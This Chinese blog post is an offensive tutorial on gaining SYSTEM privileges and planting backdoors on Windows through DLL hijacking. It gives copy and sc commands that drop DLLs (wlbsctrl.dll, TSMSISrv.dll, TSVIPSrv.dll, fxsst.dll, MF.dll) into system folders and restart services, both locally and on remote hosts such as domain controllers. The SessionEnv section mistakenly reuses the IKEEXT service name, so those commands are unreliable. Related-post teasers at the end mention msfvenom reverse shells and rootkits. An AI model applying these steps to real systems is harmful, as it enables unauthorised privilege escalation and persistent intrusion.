前言

今天看了一篇文章，发现文章中的利用方法只能在win7上使用，无法在win10上使用，特做记录。
实现效果：

得到后门执行并得到system权限。

操作过程

1.利用wlbsctrl.dll提权

IKEEXT(IKE and AuthIP IPsec Keying Modules)服务在启动时会加载wlbsctrl.dll，但Windows系统默认配置下该dll不存在，如果我们将自己的dll放在这个位置，在服务启动时就能加载该dll.

先下载恶意dll到本地，然后将其挪到C:\Windows\System32\并命名为wlbsctrl.dll：
参考命令如下：

copy calc_x64.dll C:\Windows\System32\wlbsctrl.dll
sc query IKEEXT
sc stop IKEEXT
sc start IKEEXT

远程执行：

copy calc_x64.dll \\TARGET\C$\Windows\System32\wlbsctrl.dll
sc \\TARGET query IKEEXT
sc \\TARGET stop IKEEXT
sc \\TARGET start IKEEXT

2.利用TSMSISrv.dll和TSVIPSrv.dll提权

SessionEnv(Remote Desktop Configuration)服务在启动时会加载C:\Windows\System32\TSMSISrv.dll和C:\Windows\System32\TSVIPSrv.dll，但Windows系统默认配置下这两个dll不存在，如果我们将自己的dll放在这个位置，在服务启动时就能加载该dll,启动SessionEnv服务方法为sc start IKEEXT。

利用命令：

copy calc_x64.dll C:\Windows\System32\TSMSISrv.dll
sc query IKEEXT
sc stop IKEEXT
sc start IKEEXT或者copy calc_x64.dll C:\Windows\System32\TSVIPSrv.dll
sc query IKEEXT
sc stop IKEEXT
sc start IKEEXT
远程执行的用法：copy calc_x64.dll \\TARGET\C$\Windows\System32\TSMSISrv.dll
sc \\TARGET query IKEEXT
sc \\TARGET stop IKEEXT
sc \\TARGET start IKEEXT
或者copy calc_x64.dll \\TARGET\C$\Windows\System32\TSVIPSrv.dll
sc \\TARGET query IKEEXT
sc \\TARGET stop IKEEXT
sc \\TARGET start IKEEXT

3.实现后门

如果系统开启了远程桌面的功能(支持远程连接到此计算机)，就会开启SessionEnv(Remote Desktop Configuration)服务，如果我们在C:\Windows\System32\下写入TSMSISrv.dll或TSVIPSrv.dll，就能在服务启动时加载该dll，实现代码执行。

应用场景：
获得域控制器文件的远程访问权限，但无法远程执行命令.

1.如果域控制器未开启远程桌面的功能，在系统启动时劫持Explorer.exe对fxsst.dll的加载
写入文件C:\Windows\fxsst.dll

2.如果域控制器开启了远程桌面的功能，在系统启动时将开启SessionEnv服务，加载TSMSISrv.dll或TSVIPSrv.dll
写入文件C:\Windows\System32\TSMSISrv.dll或C:\Windows\System32\TSMSISrv.dll

3.如果域控制器开启了远程桌面的功能，在用户进行远程桌面连接时将会加载MF.dll
实际测试：

测试环境： Server2012R2 x64

写入文件C:\Windows\System32\MF.dll，命令如下:

copy calc_x64.dll C:\Windows\System32\MF.dll

查考文章

《Lateral Movement — SCM and DLL Hijacking Primer》的利用扩展

win7提权system与后门相关推荐

android提权system,Android push app to /system/app/
背景个人想要了解一下关于系统权限方面的知识,而我又天真地以为只要把app push到/system/app/目录下,app就有系统签名了,也就能获取到系统权限了.但是其实这样是不行的...算了,学一 ...
Meterpreter 提权
0x01 Meterpreter自动提权 1.生成后门程序我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpret ...
juicy-potato Windows提权之访问令牌操纵
0x01 环境攻击机:Kali 受害机:Windows 2008R2 0x02 利用过程一.juicy-potato 条件限制: 需要支持SeImpersonate或者SeAssignPrimar ...
系统提权之：Windows 提权
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关.倡导维护网络安全人人有责,共同维护网络文明和谐. Wi ...
利用msf实现windows的上线与提权
环境部署攻击机:Kali ip:192.168.208.138 靶机:Win7(x64) ip:192.168.208.142 Payload (因为是靶机测试,可以在Kali开启apache2服务 ...
提权，远控生成器，查看浏览器缓存，xp密码破解
windows:普通user-> Administrator -> system(系统内核) system不包含user权限,Administrator包含user权限 Linux: u ...
通过rootkit隐蔽行踪 Linux提权
每天必问必答: ***1.每天在学什么? ***2.学了有什么用? ***3.工作中如何用? 心得:一定要把实验出错的地方.原因.解决方案都总结到笔记上.笔记一定要自己写的详细些! 服务端:xuego ...
mysql提权软件后门_Mysql提权留后门
记录一次关于无聊时对基友MYSQL服务器的提权攻击. 尽管没有完全攻击到对方,并且没有清理痕迹,但是,这里写写简单的防御方式. 0x01.从无聊的nmap扫描开始今晚无聊时候,本想打开电脑扫下谁连进 ...
后渗透篇：Windows 2008 server提权之突破系统权限安装shift后门
当你的才华还撑不起你的野心时那你就应该静下心来学习目录 Windows 2008 server提权之突破系统权限安装shift后门 0x01 前言 0x02 主要操作部分 0x03 主要命令组成 ...

win7提权system与后门

CATALOG

前言